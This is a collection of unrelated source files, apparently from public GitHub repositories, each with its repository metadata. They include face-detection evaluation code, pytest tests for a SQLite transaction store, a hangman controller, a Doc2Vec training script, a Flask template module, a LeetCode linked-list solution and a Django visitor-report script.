ax.set_title(title + ', Average of IoU: {}'.format(avg_acc))\n    ax.set_ylabel('Intersection over Unions Average')\n    ax.axes.xaxis.set_visible(False)\n    plt.show()\n\n    bad = [result[i][2] - result[i][3] for i in range(0, len(result))]\n\n    n, bins, patches = plt.hist(x=bad, bins='auto', color='#0504aa',\n                                alpha=0.7, rwidth=0.85)\n    plt.grid(axis='y', alpha=0.75)\n    plt.xlabel('Incorrect')\n    plt.ylabel('Frequency')\n    plt.title(title + ', Number of Misdetections (NumActual-NumDetected)')\n    plt.show()\n\n\ndef tester2(data, fbb):\n    '''\n    Tests the accuracy of the classifier vs. 
the ground truth.\n    Input:\n        data: list of tuples (filename, bbs (list itself)), which is the output of get_data()\n        fbb: precomputed detection arrays, one per image\n\n    Output:\n        total: list of tuples (filename, list of IoU values, number of ground-truth faces, number of detections)\n    '''\n\n    total = []\n\n    # For each image\n    for i in range(0, len(data)):\n\n        boxes = data[i][1]\n        num_faces = len(boxes)\n\n        count = 0\n        result = []\n        detections = fbb[i]\n\n        # loop over the detections\n        for j in range(0, detections.shape[2]):\n\n            # extract the confidence (i.e., probability) associated with the detection\n            confidence = detections[0, 0, j, 2]\n\n            # filter out weak detections by ensuring the confidence is greater than the minimum confidence\n            if confidence > 0.3:\n                count += 1 # keep track of found faces\n                (startX, startY, endX, endY) = detections[0, 0, j, 3:7]\n                mink = min_dist(startX, startY, boxes)\n\n                known = (boxes[mink][0], boxes[mink][1], boxes[mink][0] + boxes[mink][2], boxes[mink][1] + boxes[mink][3])\n                found = (startX, startY, endX, endY)\n\n                result.append(get_iou(known, found))\n\n        # for each image, get: name, IoU list, actual number of faces, count\n        out = (data[i][0], result, num_faces, count)\n        total.append(out)\n\n    return total\n\n\ndef tester(data, prototxtPath, weightsPath):\n    '''\n    Tests the accuracy of the classifier vs. the ground truth.\n    Input:\n        data: list of tuples (filename, bbs (list itself)), which is the output of get_data()\n        prototxtPath: path to prototext file (used for DNN architecture)\n        weightsPath: path to caffe file (used for DNN architecture)\n    Output:\n        total: list of tuples (filename, list of IoU values, number of ground-truth faces, number of detections)\n    '''\n\n    # Defining DNN (baseline classifier)\n    net = cv2.dnn.readNet(prototxtPath, weightsPath)\n\n    total = []\n\n    # For each image\n    for i in range(0, len(data)):\n\n        # load the input image from disk, and grab the image spatial dimensions\n        image = cv2.imread(data[i][0], cv2.IMREAD_COLOR)\n        (h, w) = image.shape[:2]\n\n        # construct a blob from the image\n        blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), (104.0, 177.0, 123.0))\n\n        # pass the blob through the network and obtain the face detections\n        net.setInput(blob)\n        detections = net.forward()\n        boxes = data[i][1]\n        num_faces = len(boxes)\n        count = 0\n        result = []\n\n        # loop over the detections\n        for j in range(0, detections.shape[2]):\n\n            # extract the confidence (i.e., probability) associated with the detection\n            confidence = detections[0, 0, j, 2]\n\n            # filter out weak detections by ensuring the confidence is greater than the minimum confidence\n            if confidence > 0.3:\n                count += 1 # keep track of found faces\n\n                # compute the (x, y)-coordinates of the bounding box for the object\n                box = detections[0, 0, j, 3:7] * np.array([w, h, w, h])\n                (startX, startY, endX, endY) = box.astype(\"int\")\n\n                mink = min_dist(startX, startY, boxes)\n\n                known = (\n                    boxes[mink][0], boxes[mink][1], boxes[mink][0] + boxes[mink][2], boxes[mink][1] + boxes[mink][3])\n                found = (startX, startY, endX, endY)\n\n                result.append(get_iou(known, found))\n\n        # for each image, get: name, IoU list, actual number of faces, count\n        out = (data[i][0], result, num_faces, count)\n        total.append(out)\n\n    return total","repo_name":"johngear/eecs504","sub_path":"validation_functions.py","file_name":"validation_functions.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73689374807","text":"\"\"\"\nTest transaction database. For each test, a test database is created in a temporary directory\nby the constructor of the Transaction class. Then several records are inserted through SQL statements\nto avoid potential errors from the `add` method. 
After all the tests, the temporary\ndirectory is removed.\n\"\"\"\n\n# Since we are using pytest fixtures, redefining outer name is necessary\n# pylint: disable=redefined-outer-name\n\nimport sqlite3\n\nimport pytest\n\nfrom transactions import Transaction\n\n\n@pytest.fixture\ndef setup_and_teardown(tmpdir):\n \"\"\"\n Set up a test database with several records inserted.\n :param tmpdir: pytest fixture, create a temp dir for the test\n :return: database instance\n \"\"\"\n database = Transaction(tmpdir.join('test.database'))\n con = sqlite3.connect(tmpdir.join('test.database'))\n cur = con.cursor()\n cur.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS transactions\n (\n item int,\n amount int,\n category text,\n date text,\n description text\n ) \"\"\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (1, 2, 'test1', '2022-03-21', 'This is a test')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (2, 2, 'test1', '2022-03-21', 'This is test 1')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (3, 3, 'test2', '2022-03-21', 'This is a test 2')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (4, 3, 'test2', '2022-03-22', 'This is a test 3')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (5, 4, 'test2', '2022-03-22', 'This is a test 4')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (6, 2, 'test2', '2022-04-24', 'This is a test 5')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (7, 1, 'test2', '2022-04-25', 'This is a test 6')\")\n cur.execute(\"INSERT into transactions (item, amount, category, date, description)\"\n \"values (8, 1, 'test2', '2023-02-22', 'This is a test 7')\")\n\n con.commit()\n con.close()\n return database\n\n\n@pytest.fixture\ndef setup_test_init(tmpdir):\n \"\"\"\n Set up an empty database for testing __init__ method\n :param tmpdir: pytest fixture, create a temp dir\n :return: database instance\n \"\"\"\n return Transaction(tmpdir.join('test.db'))\n\n\ndef test_init(setup_test_init):\n \"\"\"\n Test __init__ of the Transaction class\n :param setup_test_init: pytest fixture, takes care of creating and removing database files\n \"\"\"\n path = setup_test_init.database\n con = sqlite3.connect(path)\n cur = con.cursor()\n cur.execute(\"PRAGMA table_info(transactions)\")\n result = cur.fetchall()\n assert result in ([(0, 'item', 'INT', 0, None, 0),\n (1, 'amount', 'INT', 0, None, 0),\n (2, 'category', 'TEXT', 0, None, 0),\n (3, 'date', 'TEXT', 0, None, 0),\n (4, 'description', 'TEXT', 0, None, 0)],\n [(0, 'item', 'int', 0, None, 0),\n (1, 'amount', 'int', 0, None, 0),\n (2, 'category', 'text', 0, None, 0),\n (3, 'date', 'text', 0, None, 0),\n (4, 'description', 'text', 0, None, 0)])\n\n\ndef test_select_all(setup_and_teardown):\n \"\"\"\n Test select_all() method\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n assert setup_and_teardown.select_all() == [\n {'rowid': 1, 'item': 1, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is a test'},\n {'rowid': 2, 'item': 2, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is test 1'},\n {'rowid': 3, 'item': 3, 'amount': 3, 'category': 'test2',\n 'date': '2022-03-21', 
'desc': 'This is a test 2'},\n {'rowid': 4, 'item': 4, 'amount': 3, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 3'},\n {'rowid': 5, 'item': 5, 'amount': 4, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 4'},\n {'rowid': 6, 'item': 6, 'amount': 2, 'category': 'test2',\n 'date': '2022-04-24', 'desc': 'This is a test 5'},\n {'rowid': 7, 'item': 7, 'amount': 1, 'category': 'test2',\n 'date': '2022-04-25', 'desc': 'This is a test 6'},\n {'rowid': 8, 'item': 8, 'amount': 1, 'category': 'test2',\n 'date': '2023-02-22', 'desc': 'This is a test 7'}\n ]\n\n\ndef test_delete(setup_and_teardown):\n \"\"\"\n Test delete() method. Delete one and then all records in database and test content\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n setup_and_teardown.delete(3)\n assert setup_and_teardown.select_all() == [\n {'rowid': 1, 'item': 1, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is a test'},\n {'rowid': 2, 'item': 2, 'amount': 2, 'category': 'test1',\n 'date': '2022-03-21', 'desc': 'This is test 1'},\n {'rowid': 4, 'item': 4, 'amount': 3, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 3'},\n {'rowid': 5, 'item': 5, 'amount': 4, 'category': 'test2',\n 'date': '2022-03-22', 'desc': 'This is a test 4'},\n {'rowid': 6, 'item': 6, 'amount': 2, 'category': 'test2',\n 'date': '2022-04-24', 'desc': 'This is a test 5'},\n {'rowid': 7, 'item': 7, 'amount': 1, 'category': 'test2',\n 'date': '2022-04-25', 'desc': 'This is a test 6'},\n {'rowid': 8, 'item': 8, 'amount': 1, 'category': 'test2',\n 'date': '2023-02-22', 'desc': 'This is a test 7'},\n ]\n setup_and_teardown.delete(1)\n setup_and_teardown.delete(2)\n setup_and_teardown.delete(4)\n setup_and_teardown.delete(5)\n setup_and_teardown.delete(6)\n setup_and_teardown.delete(7)\n setup_and_teardown.delete(8)\n assert setup_and_teardown.select_all() == []\n\n\ndef test_add(setup_and_teardown):\n \"\"\"\n Test add() method. 
Add a new record to the database and test its content.\n    :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n    \"\"\"\n    setup_and_teardown.add({'item': 20, 'amount': 3, 'category': 'test_add',\n                            'date': '2022-03-23', 'description': 'Testing add'})\n    assert setup_and_teardown.select_all() == [\n        {'rowid': 1, 'item': 1, 'amount': 2, 'category': 'test1',\n         'date': '2022-03-21', 'desc': 'This is a test'},\n        {'rowid': 2, 'item': 2, 'amount': 2, 'category': 'test1',\n         'date': '2022-03-21', 'desc': 'This is test 1'},\n        {'rowid': 3, 'item': 3, 'amount': 3, 'category': 'test2',\n         'date': '2022-03-21', 'desc': 'This is a test 2'},\n        {'rowid': 4, 'item': 4, 'amount': 3, 'category': 'test2',\n         'date': '2022-03-22', 'desc': 'This is a test 3'},\n        {'rowid': 5, 'item': 5, 'amount': 4, 'category': 'test2',\n         'date': '2022-03-22', 'desc': 'This is a test 4'},\n        {'rowid': 6, 'item': 6, 'amount': 2, 'category': 'test2',\n         'date': '2022-04-24', 'desc': 'This is a test 5'},\n        {'rowid': 7, 'item': 7, 'amount': 1, 'category': 'test2',\n         'date': '2022-04-25', 'desc': 'This is a test 6'},\n        {'rowid': 8, 'item': 8, 'amount': 1, 'category': 'test2',\n         'date': '2023-02-22', 'desc': 'This is a test 7'},\n        {'rowid': 9, 'item': 20, 'amount': 3, 'category': 'test_add',\n         'date': '2022-03-23', 'desc': 'Testing add'}\n    ]\n\n\n@pytest.mark.add1\ndef test_add1(setup_and_teardown):\n    \"\"\"\n    Add a new record to the database and test it by selecting it and checking the length of the database.\n    \"\"\"\n\n    tran0 = {'item': '1',\n             'amount': '1',\n             'category': 'test',\n             \"date\": '20220303',\n             'description': 'testing'\n             }\n    trans0 = setup_and_teardown.select_all()\n    setup_and_teardown.add(tran0)\n    trans1 = setup_and_teardown.select_all()\n    assert len(trans1) == len(trans0) + 1\n\n\n@pytest.mark.delete1\ndef test_delete1(setup_and_teardown):\n    \"\"\"\n    Add a transaction to db, delete it, and see that the size changes\n    :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n    \"\"\"\n    # first we get the initial table\n    trans0 = setup_and_teardown.select_all()\n\n    # then we add this transaction to the table and get the new list of rows\n    tran = {'item': '1',\n            'amount': '1',\n            'category': 'test',\n            \"date\": '20220303',\n            'description': 'testing'\n            }\n    rowid = setup_and_teardown.add(tran)\n    trans1 = setup_and_teardown.select_all()\n\n    # now we delete the transaction and again get the new list of rows\n    setup_and_teardown.delete(rowid)\n    trans2 = setup_and_teardown.select_all()\n\n    assert len(trans0) == len(trans2)\n    assert len(trans2) == len(trans1) - 1\n\n\ndef test_summary_by_date(setup_and_teardown):\n    \"\"\"\n    Test summary_by_date() method.\n    :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n    \"\"\"\n    assert setup_and_teardown.summary_by_date() == [{'date': '2022-04-25', 'total': 1},\n                                                    {'date': '2023-02-22', 'total': 1},\n                                                    {'date': '2022-04-24', 'total': 2},\n                                                    {'date': '2022-03-21', 'total': 7},\n                                                    {'date': '2022-03-22', 'total': 7}]\n\n\ndef test_summary_by_month(setup_and_teardown):\n    \"\"\"\n    Test summary_by_month() method.\n    :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n    \"\"\"\n    assert setup_and_teardown.summary_by_month() == [{'month': '02', 'total': 1},\n                                                     {'month': '04', 'total': 3},\n                                                     {'month': '03', 'total': 14}]\n\n\ndef test_summary_by_year(setup_and_teardown):\n    
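# expected from the fixture rows above: 2022 -> 2+2+3+3+4+2+1 = 17, 2023 -> 1\n    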
\"\"\"\n Test summary_by_year() method.\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n assert setup_and_teardown.summary_by_year() == [{'total': 1, 'year': '2023'},\n {'total': 17, 'year': '2022'}]\n\n\ndef test_summary_by_category(setup_and_teardown):\n \"\"\"\n Test summary_by_category() method.\n :param setup_and_teardown: pytest fixture, takes care of creating and removing database files\n \"\"\"\n assert setup_and_teardown.summary_by_category() == [{'category': 'test1', 'total': 4},\n {'category': 'test2', 'total': 14}]\n","repo_name":"yanxuanshaozhu/103A-PA02","sub_path":"pa02/test_transaction.py","file_name":"test_transaction.py","file_ext":"py","file_size_in_byte":11257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35073143255","text":"from random import choice\r\n\r\n\r\nclass Service(object):\r\n \r\n \r\n def __init__(self, repo_sentences, validator):\r\n self.__repo = repo_sentences\r\n self.__valid = validator\r\n \r\n \r\n def add_sentence(self,sentence):\r\n \r\n self.__valid.valid_sentence(sentence)\r\n self.__repo.add()\r\n \r\n def get_hangman(self):\r\n number = self.__repo.get_hangman()\r\n hangman = ''\r\n word = \"hangman\"\r\n i = 0\r\n while i< number:\r\n hangman += word[i]\r\n i+=1\r\n return hangman\r\n \r\n def check_letter(self, letter):\r\n sentence = self.__repo.get_sentence()\r\n if letter not in sentence or letter in self.__repo.get_code():\r\n self.__repo.set_hangman(self.__repo.get_hangman()+1)\r\n else:\r\n i = 0\r\n for l in sentence:\r\n if l == letter:\r\n code = self.__repo.get_code()\r\n code = code[:i] + l + code[i+1:]\r\n self.__repo.set_code(code)\r\n i+=1 \r\n \r\n \r\n \r\n def get_code(self):\r\n return self.__repo.get_code()\r\n \r\n def start_game(self):\r\n self.__repo.get_random_sentence()\r\n \r\n def is_lose(self):\r\n if self.__repo.get_hangman == 7:\r\n return True\r\n return False\r\n \r\n def is_win(self):\r\n if self.__repo.get_sentence() == self.__repo.get_code():\r\n return True\r\n return False\r\n \r\n\r\n\r\n\r\n","repo_name":"dianatalpos/Fundamentals-of-Programming","sub_path":"hangman/business/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8619390052","text":"import ast\nimport os\nfrom gensim.models.doc2vec import Doc2Vec, TaggedDocument\nimport pandas as pd\nimport argparse\n\ndef main(args):\n if not os.path.isdir(args.doc2vec_dir):\n os.makedirs(args.doc2vec_dir)\n\n # prepare data\n df = pd.read_csv(args.train_path)\n\n titles = [TaggedDocument(ast.literal_eval(doc), [i]) for i, doc in enumerate(df['outtitle'])]\n reviews = [TaggedDocument(ast.literal_eval(doc), [i]) for i, doc in enumerate(df['outreview'])]\n\n # train and save\n title_model = Doc2Vec(titles, size=args.title_dim, window=2, workers=4)\n title_model_path = os.path.join(args.doc2vec_dir, 'd2v_title_{}'.format(args.title_dim))\n title_model.save(title_model_path)\n\n review_model = Doc2Vec(reviews, size=args.review_dim, window=2, workers=4)\n review_model_path = os.path.join(args.doc2vec_dir, 'd2v_review_{}'.format(args.review_dim))\n review_model.save(review_model_path)\n\n print('Result:')\n print('title: {}'.format(title_model_path))\n print('review: {}'.format(review_model_path))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--train_path', 
type=str, required=True,\n help='Path of train dataset CSV file')\n parser.add_argument('--doc2vec_dir', type=str, required=True,\n help='Directory of Doc2Vec models')\n parser.add_argument('--title_dim', type=int, required=False, default=100,\n help='Dimension of title vectors')\n parser.add_argument('--review_dim', type=int, required=False, default=300,\n help='Dimension of review vectors')\n args = parser.parse_args()\n\n main(args)","repo_name":"chadaeun/2018-data-science-competition-final","sub_path":"prepare_doc2vec.py","file_name":"prepare_doc2vec.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20340903644","text":"\"\"\"Run this script to collate the data.\"\"\"\n\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nHERE = Path(__file__).parent.resolve()\nROOT = HERE.parent.resolve()\nDATA = ROOT.joinpath(\"data\")\nARTIFACTS = ROOT.joinpath(\"artifacts\")\nARTIFACTS.mkdir(exist_ok=True, parents=True)\nOUTPUT_PATH = ARTIFACTS.joinpath(\"collated.tsv\")\nSUMMARY_SVG_PATH = ARTIFACTS.joinpath(\"summary.svg\")\nHEADER = [\"#prefix\", \"did\", \"when\", \"nextofkin\"]\n\n\ndef main():\n \"\"\"Collate all files together.\"\"\"\n rows = []\n for path in DATA.glob(\"*.tsv\"):\n with path.open() as file:\n _header = next(file)\n for line in file:\n dead_id, when, alt_id = line.strip(\"\\n\").split(\"\\t\")\n rows.append((path.stem, dead_id, when, alt_id))\n\n rows = sorted(rows)\n\n with OUTPUT_PATH.open(\"w\") as file:\n print(*HEADER, sep=\"\\t\", file=file)\n for row in rows:\n print(*row, sep=\"\\t\", file=file)\n\n df = pd.DataFrame(rows, columns=[\"prefix\", \"dead_id\", \"date\", \"alternative_id\"])\n fig, ax = plt.subplots(figsize=(6, 3))\n sns.histplot(data=df, y=\"prefix\", ax=ax)\n ax.set_ylabel(\"\")\n ax.set_xscale(\"log\")\n ax.set_xlabel(\"Dead Identifiers\")\n fig.tight_layout()\n fig.savefig(SUMMARY_SVG_PATH)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bridgedb/tiwid","sub_path":"scripts/collate.py","file_name":"collate.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"37724401876","text":"## @file\n## @brief Flask templates\n\nfrom metaL import *\n\n## @defgroup fl FL\n## @brief Flask templates\n## @ingroup web\n## @{\n\n\nclass flModule(webModule):\n\n def init_reqs(self):\n super().init_reqs()\n (self.reqs // 'flask').sync()\n\n def static_logo(self):\n return \"{{ url_for('static', filename='logo.png') }}\"\n\n def init_py(self):\n super().init_py()\n self.init_index()\n self.py.top //\\\n pyImport('flask') //\\\n f'app = flask.Flask(\"{self}\")'\n self.py.mid //\\\n self.index\n self.py.bot //\\\n 'app.run(host=config.HOST,port=config.PORT,debug=True)'\n self.py.sync()\n\n def init_index(self):\n self.index = Section('index')\n self.index //\\\n \"@app.route('/')\" //\\\n (S('def index():') //\n 'return flask.render_template(\"index.html\")'\n )\n\n def init_vscode_ext(self):\n super().init_vscode_ext()\n self.vscode.ext.ext // '\"wholroyd.jinja\",'\n self.vscode.ext.sync()\n\n\n## @}\n","repo_name":"ponyatov/metaLv0","sub_path":"fl.py","file_name":"fl.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"33864082490","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 18 12:07:49 
2019\n\n@author: Alejandro\n\"\"\"\n\n\"\"\" 6. Define a function inversa() that computes the reverse of a string. \nFor example the string estoy probando should return the string odnaborp yotse \"\"\"\n\ndef inversa(cadena):\n    inversa = \"\"\n    for i in range(len(cadena), 0, -1):\n        inversa += cadena[i-1]\n    return inversa\n\nif __name__ == '__main__':\n    print(inversa(\"estoy probando\"))","repo_name":"AlejandroDmartz/Python","sub_path":"Boletin_basico/Ejercicio6.py","file_name":"Ejercicio6.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"19954522976","text":"'''\nProblem description:\nGiven a linked list whose head node is root, write a function to split the linked list into k consecutive parts.\n\nThe parts should be as equal in length as possible: no two parts may differ in length by more than 1, so some parts may be null.\n\nThe k parts should be output in the order in which they appear in the linked list, and earlier parts should be longer than or equal to later ones.\n\nReturn a list of linked lists that satisfies the rules above.\n\nExample: 1->2->3->4, k = 5 // 5 gives [ [1], [2], [3], [4], null ]\n\nExample 1:\nInput:\nroot = [1, 2, 3], k = 5\nOutput: [[1],[2],[3],[],[]]\nExplanation:\nEach part of the input and output should be a linked list, not an array.\nFor example, the input node root has val = 1, root.next.val = 2, root.next.next.val = 3, and root.next.next.next = null.\nThe first output output[0] has output[0].val = 1, output[0].next = null.\nThe last element output[4] is null, representing an empty linked list as the last part.\n\nExample 2:\nInput:\nroot = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10], k = 3\nOutput: [[1, 2, 3, 4], [5, 6, 7], [8, 9, 10]]\nExplanation:\nThe input is split into several consecutive parts whose lengths differ by at most 1; earlier parts are longer than or equal to later parts.\n\n\nConstraints:\nThe length of root is in the range [0, 1000].\nThe value of each input node is in the range [0, 999].\nk is in the range [1, 50].\n'''\n\n'''\nApproach:\nlength // k gives the minimum number of Nodes each of the k lists must hold.\nlength % k gives the number of leftover Nodes; hand them out one per list from front to back until they run out.\nFor example, n = 10 and k = 3 give base = 3 and bonus = 1, so the part sizes are 4, 3, 3.\n'''\n\nfrom LinkedList.ListNode import ListNode\nfrom typing import List\n\n\nclass Solution:\n    def splitListToParts(self, head: ListNode, k: int) -> List[ListNode]:\n\n        ans = []\n        # length of the linked list\n        queue = []\n        n = 0\n        while head:\n            n += 1\n            queue.append(head)\n            head = head.next\n\n        base = n // k\n        bonus = n % k\n\n        for _ in range(k):\n            cur_part = []\n\n            # place the base number of nodes first\n            for _ in range(base):\n                cur_part.append(queue.pop(0))\n\n            # then place one bonus node while any remain\n            if bonus > 0:\n                cur_part.append(queue.pop(0))\n                bonus -= 1\n\n            if cur_part:\n                newHead = cur_part[0]\n                end = cur_part[-1]\n                end.next = None\n                ans.append(newHead)\n            else:\n                ans.append(None)\n\n        return ans\n\n    def splitListToParts2(self, head: ListNode, k: int) -> List[ListNode]:\n        # faster\n        ans = []\n        root = head\n        # length of the linked list\n        n = 0\n        while head:\n            n += 1\n\n            head = head.next\n\n        base = n // k\n        bonus = n % k\n\n        for _ in range(k):\n            ans.append(root)\n            if bonus > 0:\n                for _ in range(base):\n                    root = root.next\n                bonus -= 1\n            else:\n                for _ in range(base - 1):\n                    root = root.next\n\n            if root:\n                temp = root.next\n                root.next = None\n            else:\n                temp = None\n\n            root = temp\n\n        return ans\n\n","repo_name":"JTShuai/LeetCode_Notes","sub_path":"LinkedList/725_分隔链表.py","file_name":"725_分隔链表.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"37261452958","text":"from django.urls import path, include\nfrom rest_framework.routers import DefaultRouter\nfrom rest_framework.authtoken.views import ObtainAuthToken\n\nfrom .views import (\n    BloggerCreateView, \n    ActivateAccountView,\n    FollowRelationView\n)\n\nrouter = DefaultRouter()\nrouter.register(r'blogger', BloggerCreateView)\n\n\nurlpatterns = [\n    path('', include(router.urls)),\n    path('activate///', ActivateAccountView.as_view()),\n    path('login/', ObtainAuthToken.as_view()),\n    path('follow///', 
FollowRelationView.as_view())\n]","repo_name":"Ezenwankwo/yarn","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73508367767","text":"import sys\nfrom select import select\nfrom pathlib import Path\nfrom colorama import init, Fore, Back, Style\nfrom work.models import Visitor, Mage\n\ndebug = False\n\ninit(autoreset = True)\nprint(Fore.BLACK + Back.CYAN + '******* {} *******'.format(Path(__file__)))\n\nvisitall = Visitor.objects.all()\nvisit = visitall.order_by('-date')\nprint(Fore.GREEN + 'total {}'.format(visit.count()))\nvisivote = Visitor.objects.filter(voted=True)\nprint(Back.BLUE + '\\n{} voted'.format(visivote.count()))\nfor v in visivote: print(v.ip_address)\nvisimess = Visitor.objects.exclude(message='')\nprint(Back.MAGENTA + '\\n{} messages'.format(visimess.count()))\nfor v in visimess: print('message[{}] = {} {}'.format(v.ip_address,\n\t\t\t\t\t\t\t\t\t\t\t\t\t v.dessage(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t len(v.mages.all())))\n\nroboco = 0\nfor v in visit:\n\tv.set_bifi()\n\ttn = Fore.BLUE + '{} {} '.format(v.ip_address, v.bifistr)\n\tif v.has_message(): tn += Fore.GREEN + 'message: {} '.format(v.dessage())\n\tif v.voted:\ttn += Fore.MAGENTA + 'voted '\n\tif v.lang == 'en': tn += Fore.CYAN + 'changed language '\n\tif v.marray_size() > 0:\ttn += Fore.BLUE + 'marray_size: {}, code: {} '.format(v.marray_size(), v.code)\n\tif v.is_robo():\n\t\troboco += 1\n\t\ttn += Fore.RED + '(-robo-)'\n\n\tif debug: print(tn)\n\nif roboco == 10: print(Fore.BLACK + Back.CYAN + 'no robots detected')\nelse:\n\tprint(Fore.BLACK + Back.CYAN +\n\t\t '\\n{} robot records detected, i have created a python script named delete_robo.py to delete the majority of these records'.format(roboco))\n\tprint(Fore.WHITE + Back.BLACK +\n\t\t 'manage.py shell -c \\'import script.delete_robo\\'' +\n\t\t Fore.BLACK + Back.CYAN +\n\t\t '\\nto delete robot record from the database')\n\tprint()\n\ndef run():\n\tvv = Visitor.objects.all()\n\tmm = Mage.objects.all()\n\n\tfor m in mm:\n\t\tdanni = []\n\t\tfor v in vv:\n\t\t\tipa = v.ip_address\n\t\t\tif m in v.mages.all():\n\t\t\t\tif ipa == '127.5.0.1': pass\n\t\t\t\telse: danni.append(ipa)\n\n\t\tif len(danni) > 0: print('{} -> {}'.format(m, danni))\n\nif debug: run()\n\n\n\n","repo_name":"kaloyansen/deploy","sub_path":"app/script/visit.py","file_name":"visit.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17060499932","text":"import csv\nimport os\nimport re\n\n\ndef get_country_list(name):\n '''\n get a list of countries for a region. 
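Rows are read from resources/<name>.csv and returned as Country(name, lat, lon) objects. 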
Currently implemented regions: europe\n    '''\n    filename = os.path.join(os.path.dirname(__file__), \"resources\", f\"{name}.csv\")\n\n    countries = []\n    point = re.compile(r'POINT\\s*\\((.*)\\)')\n    with open(filename, newline='') as fh:\n        reader = csv.DictReader(fh)\n        for row in reader:\n            if row['id'].startswith('#'):\n                continue\n            m = re.search(point, row['point'])\n            if m:\n                lon, lat = m[1].split(sep=\" \")\n                countries.append(Country(row['name'], float(lat), float(lon)))\n    return countries\n\n\nclass Country:\n    def __init__(self, name, lat: float, lon: float) -> None:\n        self.name = name\n        self.lat = lat\n        self.lon = lon\n    def __str__(self) -> str:\n        return \",\".join([self.name, f\"POINT({self.lon:.3f} {self.lat:.3f})\"])\n    def __repr__(self) -> str:\n        return f\"Country({self})\"\n\ndef _to_diana_txt_file(filename, name):\n    with open(filename, 'wt') as fh:\n        fh.write('''# -*- coding: utf-8 -*-\n[COLUMNS\nLon:r Lat:r Name:s ]\n\n[DATA]\n''')\n        for cc in get_country_list(name):\n            fh.write(f\"{cc.lon} {cc.lat} \\\"{cc.name}\\\"\\n\")\n\n\nif __name__ == '__main__':\n    print(get_country_list('europe'))\n","repo_name":"metno/snap","sub_path":"utils/SnapPy/Snappy/Countries.py","file_name":"Countries.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"31"}
+{"seq_id":"24258824171","text":"#!/usr/bin/python3\n\nimport string\n\nnum_workers = 5\ntime_const = 60\n\nwith open('./resources/input.txt', 'r') as f:\n    contents = f.read().splitlines()\n\n    prereq_index = {}\n    ordered_steps = []\n\n    # Parse everything we need to know about the steps\n    for record in contents:\n        focal_step = record[36]\n        prereq = record[5]\n\n        if prereq not in prereq_index:\n            prereq_index[prereq] = {}\n            prereq_index[prereq]['prereqs'] = set()\n            prereq_index[prereq]['length'] = string.ascii_uppercase.index(prereq) + 1 + time_const\n            prereq_index[prereq]['done'] = 0\n\n        if focal_step in prereq_index:\n            prereq_index[focal_step]['prereqs'].add(prereq)\n        else:\n            prereq_index[focal_step] = {}\n            prereq_index[focal_step]['prereqs'] = set([prereq])\n            prereq_index[focal_step]['length'] = string.ascii_uppercase.index(focal_step) + 1 + time_const\n            prereq_index[focal_step]['done'] = 0\n\n    completed = set()\n\n    # How many steps are there?\n    jobs = len(prereq_index)\n    time_taken = 0\n\n    # What are we working on?\n    worker_status = [''] * num_workers\n\n    while len(completed) < jobs:\n        # Which steps are ready?\n        candidates = []\n        for focal_step in prereq_index:\n            if len(prereq_index[focal_step]['prereqs'] - completed) == 0:\n                candidates.append(focal_step)\n\n        # Which steps are in progress?\n        candidates.sort()\n        for ongoing_job in worker_status:\n            if ongoing_job 